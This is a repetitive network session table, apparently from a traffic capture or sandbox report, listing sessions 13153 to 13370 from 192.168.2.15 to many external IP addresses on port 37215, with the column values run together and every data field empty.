                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13153192.168.2.1540524102.156.96.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13154192.168.2.155122631.155.255.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13155192.168.2.1536794157.183.109.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13156192.168.2.1544692156.80.130.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13157192.168.2.154338231.197.54.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13158192.168.2.1550630186.251.217.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13159192.168.2.1539834138.54.183.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13160192.168.2.1541290190.16.72.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13161192.168.2.155504294.200.23.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13162192.168.2.1542784186.128.184.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13163192.168.2.1556938190.40.87.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13164192.168.2.153586437.208.133.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13165192.168.2.1552332197.194.72.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13166192.168.2.1552286222.75.86.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13167192.168.2.155606637.239.79.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13168192.168.2.1555492102.205.252.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13169192.168.2.1552508222.66.156.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13170192.168.2.1536230197.123.244.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13171192.168.2.155444837.145.29.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13172192.168.2.1539050122.82.13.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13173192.168.2.1554086222.108.232.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13174192.168.2.1539100156.172.126.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13175192.168.2.154985045.37.209.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13176192.168.2.1542702186.241.44.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13177192.168.2.1537188186.185.51.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13178192.168.2.1536004197.105.136.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13179192.168.2.1549194156.53.167.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13180192.168.2.1546204190.105.57.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13181192.168.2.1543528186.25.87.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13182192.168.2.155977445.147.191.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13183192.168.2.154546853.16.129.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13184192.168.2.1548146122.68.19.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13185192.168.2.1551878156.90.155.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13186192.168.2.154317641.216.85.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13187192.168.2.155313441.163.118.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13188192.168.2.1537334102.215.213.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13189192.168.2.1545874121.195.95.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13190192.168.2.1538336138.107.198.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13191192.168.2.1554404138.5.196.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192192.168.2.1548038157.255.170.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13193192.168.2.1559038156.239.238.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13194192.168.2.1543296122.246.228.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13195192.168.2.1560430102.38.118.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13196192.168.2.1538234186.62.251.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13197192.168.2.1534976186.129.80.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13198192.168.2.1546250181.103.160.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13199192.168.2.155442437.33.103.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13200192.168.2.155585694.197.100.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13201192.168.2.154496037.212.55.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13202192.168.2.1543812156.116.34.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13203192.168.2.1548684186.83.176.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13204192.168.2.155141431.158.161.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13205192.168.2.1541212112.45.208.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13206192.168.2.155682494.239.190.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13207192.168.2.1537336157.146.52.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13208192.168.2.1537048102.47.162.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13209192.168.2.153749645.239.176.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13210192.168.2.1539694157.85.254.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13211192.168.2.1560118181.46.75.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13212192.168.2.155882041.243.59.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13213192.168.2.1542758186.112.179.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13214192.168.2.1555156121.42.13.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13215192.168.2.155451645.144.145.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13216192.168.2.1546250122.143.118.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13217192.168.2.1558106138.152.120.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13218192.168.2.154947494.229.128.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13219192.168.2.1554846121.173.162.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13220192.168.2.1542378121.174.123.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13221192.168.2.1534876138.99.79.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13222192.168.2.154467245.183.163.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13223192.168.2.1539846157.91.224.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13224192.168.2.1559454190.14.59.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13225192.168.2.153533645.139.228.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13226192.168.2.1545692156.87.61.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13227192.168.2.1559910190.29.232.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13228192.168.2.1553866181.219.161.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13229192.168.2.1554258102.77.113.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13230192.168.2.1552382157.39.183.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13231192.168.2.1548570122.55.1.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13232192.168.2.1553308157.248.207.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13233192.168.2.1560496136.9.9.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13234192.168.2.1535628122.245.149.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13235192.168.2.1553850181.18.213.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13236192.168.2.1559582122.238.60.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13237192.168.2.1542096122.164.123.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13238192.168.2.1534750181.89.54.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13239192.168.2.156049241.39.188.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13240192.168.2.1538156197.188.177.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13241192.168.2.1558212197.202.162.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13242192.168.2.1533696181.9.200.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13243192.168.2.154259041.196.109.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13244192.168.2.1539964190.0.235.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13245192.168.2.1541120181.189.209.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13246192.168.2.153826437.237.92.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13247192.168.2.153658031.27.229.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13248192.168.2.154060631.44.50.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13249192.168.2.1546106122.95.154.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13250192.168.2.1548368138.16.221.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13251192.168.2.1554440186.207.47.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13252192.168.2.1548634222.136.29.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13253192.168.2.1540206138.120.169.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13254192.168.2.154461494.113.123.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13255192.168.2.1555454102.182.199.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13256192.168.2.1548468156.219.57.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13257192.168.2.1556652181.162.187.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13258192.168.2.1551030119.174.242.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13259192.168.2.1551742181.206.205.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13260192.168.2.154324245.219.185.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13261192.168.2.155572045.231.115.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13262192.168.2.1549798190.59.200.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13263192.168.2.1557742197.228.96.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13264192.168.2.1552478222.102.157.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13265192.168.2.1557780156.243.251.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13266192.168.2.155036694.216.62.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13267192.168.2.155303037.106.116.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13268192.168.2.1547880102.109.61.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13269192.168.2.153315631.68.180.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13270192.168.2.155297294.198.225.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13271192.168.2.154571494.90.104.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13272192.168.2.1557488197.205.34.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13273192.168.2.154797241.194.202.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13274192.168.2.1535214102.138.167.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13275192.168.2.1538338197.27.174.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13276192.168.2.1556646197.63.64.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13277192.168.2.1549646102.74.103.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13278192.168.2.1546084197.2.233.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13279192.168.2.1534980156.251.140.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13280192.168.2.154191845.136.205.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13281192.168.2.1546822186.179.218.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13282192.168.2.155423094.215.237.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13283192.168.2.154868241.249.101.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13284192.168.2.1548496222.5.61.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13285192.168.2.1543674121.59.92.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13286192.168.2.1535602121.4.23.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13287192.168.2.1556822156.94.215.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13288192.168.2.155638241.85.150.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13289192.168.2.1542414181.141.142.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13290192.168.2.1538384190.134.6.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13291192.168.2.1539902122.84.152.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13292192.168.2.1546172186.160.195.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13293192.168.2.154585841.225.253.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13294192.168.2.1545838156.166.135.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13295192.168.2.1554070102.122.233.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13296192.168.2.1544982102.49.117.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13297192.168.2.1551004190.232.123.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13298192.168.2.1539468186.42.192.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13299192.168.2.1551424165.119.148.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13300192.168.2.154099453.188.222.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13301192.168.2.1558550122.27.102.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13302192.168.2.1536512181.249.142.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13303192.168.2.1533624186.240.185.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13304192.168.2.1554108181.148.9.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13305192.168.2.1537666190.177.185.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13306192.168.2.1559554138.178.133.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13307192.168.2.1536512190.163.195.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13308192.168.2.1544986102.45.197.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13309192.168.2.1539996197.183.158.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13310192.168.2.154568094.141.213.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13311192.168.2.1540792157.118.55.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13312192.168.2.1560762102.66.238.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13313192.168.2.1548790121.181.184.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13314192.168.2.155884045.137.157.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13315192.168.2.1545616122.207.232.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13316192.168.2.1556916138.160.120.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13317192.168.2.1553960156.185.147.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13318192.168.2.155482694.233.189.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13319192.168.2.1546994121.61.27.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13320192.168.2.1539066157.248.205.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13321192.168.2.1556406156.167.62.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13322192.168.2.1548576190.135.2.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13323192.168.2.153792637.162.229.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13324192.168.2.1557084217.59.17.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13325192.168.2.154581895.75.143.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13326192.168.2.1560796146.223.52.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13327192.168.2.1538822122.45.86.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13328192.168.2.1554166102.44.188.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13329192.168.2.1533256122.197.76.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13330192.168.2.1552328121.73.122.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13331192.168.2.155313494.38.152.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13332192.168.2.1535626190.182.176.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13333192.168.2.1556536157.203.219.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13334192.168.2.1549864181.90.18.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13335192.168.2.1557326181.210.47.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13336192.168.2.1543216181.10.16.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13337192.168.2.1540500157.161.12.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13338192.168.2.1558750222.147.162.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13339192.168.2.156082631.25.110.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13340192.168.2.153416245.162.16.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13341192.168.2.1557230121.231.15.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13342192.168.2.154529637.177.110.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13343192.168.2.1534128186.66.190.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13344192.168.2.1539616138.147.131.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13345192.168.2.1555620157.23.20.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13346192.168.2.1555598156.92.156.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13347192.168.2.1547130222.99.182.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13348192.168.2.155877231.75.92.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13349192.168.2.1547548157.154.211.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13350192.168.2.1532858222.69.101.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13351192.168.2.155708831.75.12.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13352192.168.2.1537228156.121.84.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13353192.168.2.1539054121.69.78.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13354192.168.2.1533792156.82.126.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13355192.168.2.1540922121.122.25.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13356192.168.2.1556626197.159.180.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13357192.168.2.1544516222.219.183.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13358192.168.2.1548290156.41.232.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13359192.168.2.1551362138.46.212.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13360192.168.2.1540484201.149.38.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13361192.168.2.1555856121.137.107.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13362192.168.2.1552302186.8.88.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13363192.168.2.1554026122.4.152.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13364192.168.2.1539320156.187.42.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13365192.168.2.153280637.49.81.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13366192.168.2.153616237.147.117.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13367192.168.2.1557702186.46.169.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13368192.168.2.153364637.11.184.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13369192.168.2.1550686138.249.77.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13370192.168.2.1537996181.125.145.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
